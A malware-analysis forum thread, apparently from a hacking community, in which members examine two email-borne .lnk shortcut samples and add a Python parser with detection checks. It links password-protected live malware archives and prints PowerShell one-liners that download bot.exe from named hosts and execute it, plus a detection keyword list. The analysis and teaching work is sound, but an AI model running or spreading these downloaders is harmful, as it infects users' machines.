EvilZone

Hacking and Security => Reverse Engineering

: [Beginner Challenge] LNK Samples
: Deque January 25, 2016, 01:35:58 PM
Both samples are from the same malware family and arrived via email attachment. Typical file names are Dokument_8979121242.doc.lnk or DHL_id_162723593211.doc.lnk.
Feel free to analyse them and tell us anything you found out.

These archives contain live malware!

7f5a31266205a20b4e1248b4b62b0cf7471c8c2f64159f3c50846e5fffbd9e9a.zip (http://upload.evilzone.org?page=download&file=hrNDj7QAkfNYg9C3ytAl36k5EiKKjZ65VcQgOdgOrYq8ogPXHe)

55e81b0dfa1fd8e841f57b2b64e153cf2e93bed58dac2eaa7c81436ff250f56e.zip (http://upload.evilzone.org?page=download&file=7P33BT05wEZRXDwgaj3aU62mphVSJm9stxZxfyv88KenMTes9L)

The password is "infected".
: Re: [Beginner Challenge] LNK Samples
: Psycho_Coder January 26, 2016, 08:55:37 PM
Analysis for file 7f5a*.lnk

Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Sun, 25 Oct 2015 20:40:10 GMT
Last Modified Date: Sun, 25 Oct 2015 20:40:10 GMT

Comments:

The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and passes arguments to it to download a file, save it in the temp folder as a.exe, and then run the newly saved application. The file tries to download a file from the URL hxxp://goodvin77787.in/bot.exe; taking the extension into consideration, it appears to be a PE file, but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:

:
(new-object System.Net.WebClient).DownloadFile('http://goodvin77787.in/bot.exe','%TEMP%\a.exe');Start-Process "%TEMP%\a.exe

Moreover, the process window show command value was found to be SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process a.exe is iconified; the icon is taken from SHELL32.DLL, with icon index 54 and dimensions 24x24.



Analysis for file 55e8*.lnk

Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Thu, 29 Oct 2015 04:37:08 GMT
Last Modified Date: Thu, 29 Oct 2015 04:37:08 GMT

Comments:

The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and passes arguments to it to download a file, save it in the temp folder as z.exe, and then run the newly saved application. The file tries to download a file from the URL hxxp://goodprice28.pw/bot.exe; taking the extension into consideration, it appears to be a PE file, but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:

:
(new-object System.Net.WebClient).DownloadFile('http://goodprice28.pw/bot.exe','%TEMP%\z.exe');Start-Process "%TEMP%\z.exe

Moreover, the process window show command value was found to be SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process z.exe is iconified; the icon is taken from SHELL32.DLL, with icon index 70 and dimensions 24x24.


I am not writing any specific conclusion since I am not able to directly examine the bot.exe files and see their effect. I hope this much is fine. Let me know where I messed up; I would also like to know if anything specific can be deduced from the SID that is present in both files.

Edit: Made malicious links unclickable -Deque
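The fields reported in the analysis above (the 4C 00 00 00 / 01 14 02 00 ... 46 "magic", the timestamps, ShowCommand, the icon index and the reconstructed argument string) all come from the documented [MS-SHLLINK] layout: a 76-byte ShellLinkHeader whose first two fields are HeaderSize (0x4C) and the shell-link CLSID 00021401-0000-0000-C000-000000000046, followed by optional LinkTargetIDList and LinkInfo blocks and then the StringData sections (arguments, icon location, and so on) in a fixed order. The script below is an added example, not code from the thread or from either poster: it parses those fields, pulls out the command line and icon location the way the hex-editor reconstruction did, and runs a few triage checks for mail-borne .lnk files. The sample it parses is constructed in memory; the host example.invalid, the `-w`-less argument string and the VolumeID contents are assumptions chosen only to mirror the shape described in the post, and the timestamp is the creation date reported for the 7f5a* sample.

```python
"""Minimal MS-SHLLINK (.lnk) parser with triage checks for mail-borne shortcuts.

Added example for this thread, not the original poster's code. The sample
.lnk is constructed in memory so the script runs offline; field offsets follow
the public [MS-SHLLINK] specification.
"""
import struct
from datetime import datetime, timezone, timedelta

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# LinkFlags bits (MS-SHLLINK 2.1.1) that control which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}


def from_filetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def to_filetime(dt):
    return (dt - FILETIME_EPOCH) // timedelta(microseconds=1) * 10


def parse_lnk(data):
    """Parse header, LinkInfo local path and the StringData sections of a .lnk."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file (bad HeaderSize/LinkCLSID)")
    flags, _attrs, ctime, _atime, wtime, _size, icon_index, show_cmd = struct.unpack_from("<IIQQQIiI", data, 20)
    rec = {"creation_time": from_filetime(ctime), "write_time": from_filetime(wtime),
           "icon_index": icon_index, "show_command": SHOW_COMMANDS.get(show_cmd, hex(show_cmd)),
           "local_base_path": None}
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList; we only skip it
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize, HeaderSize, LinkInfoFlags, VolumeIDOffset, LocalBasePathOffset
        li_size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, off)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            start = off + base_off
            rec["local_base_path"] = data[start:data.index(b"\x00", start)].decode("latin-1")
        off += li_size
    # StringData: 2-byte CountCharacters then the string (UTF-16LE if IsUnicode), fixed order, no terminator
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
                      (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location")):
        rec[key] = None
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[off:off + width * count]
            rec[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("latin-1")
            off += width * count
    return rec


def triage(rec):
    """Indicators an analyst would flag on a shortcut that arrived by e-mail."""
    hits = []
    if "powershell" in (rec["local_base_path"] or "").lower():
        hits.append("target is powershell.exe")
    args = rec["arguments"] or ""
    for token in ("WebClient", "DownloadFile", "DownloadString", "Start-Process", "Invoke-Expression", "IEX"):
        if token.lower() in args.lower():
            hits.append("argument contains " + token)
    if "%temp%" in args.lower():
        hits.append("payload dropped to %TEMP%")
    if rec["show_command"] == "SW_SHOWMINNOACTIVE":
        hits.append("window starts minimized (SW_SHOWMINNOACTIVE)")
    if "shell32" in (rec["icon_location"] or "").lower():
        hits.append("icon borrowed from SHELL32.dll")
    return hits


def build_sample_lnk():
    """Constructed .lnk with the shape described in the thread (not the real sample)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    ts = to_filetime(datetime(2015, 10, 25, 20, 40, 10, tzinfo=timezone.utc))
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20, ts, ts, ts, 0, 54, 7, 0, 0, 0, 0)
    id_list = struct.pack("<HH", 2, 0)                         # IDList holding only the TerminalID
    volume_id = struct.pack("<IIII", 0x11, 3, 0, 0x10) + b"\x00"  # minimal VolumeID, assumed values
    base_path = b"C:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\x00"
    vol_off = 28
    base_off = vol_off + len(volume_id)
    suffix_off = base_off + len(base_path)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, 28, 0x1, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + base_path + b"\x00"               # empty CommonPathSuffix
    # Assumed argument string: same structure as the post, host replaced by a reserved name
    args = ("(new-object System.Net.WebClient).DownloadFile('http://example.invalid/bot.exe',"
            "'%TEMP%\\a.exe');Start-Process \"%TEMP%\\a.exe\"")
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + id_list + link_info + sd(args) + sd("SHELL32.dll")


def sample_record():
    return parse_lnk(build_sample_lnk())


if __name__ == "__main__":
    rec = sample_record()
    for k, v in rec.items():
        print(f"{k:17} {v}")
    print("indicators:", triage(rec))
```

To use it on a real sample, read the file in binary mode and pass the bytes to parse_lnk; do this on an analysis host, never by double-clicking the .lnk. The parser skips the LinkTargetIDList instead of decoding its ItemIDs, so a shortcut whose target is expressed only through the ID list (no LinkInfo) will show local_base_path as None while the arguments still parse.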
: Re: [Beginner Challenge] LNK Samples
: Deque January 27, 2016, 01:54:09 PM
This is a very detailed analysis. I couldn't have done it better.
PS: Please disarm any malware download links in the future. Even if they are not working anymore. ;)
: Re: [Beginner Challenge] LNK Samples
: Psycho_Coder January 27, 2016, 03:56:19 PM
Quote from: Deque on January 27, 2016, 01:54:09 PM
This is a very detailed analysis. I couldn't have done it better.
PS: Please disarm any malware download links in the future. Even if they are not working anymore. ;)

Thanks. Sorry about the links, I will remember it from now onwards.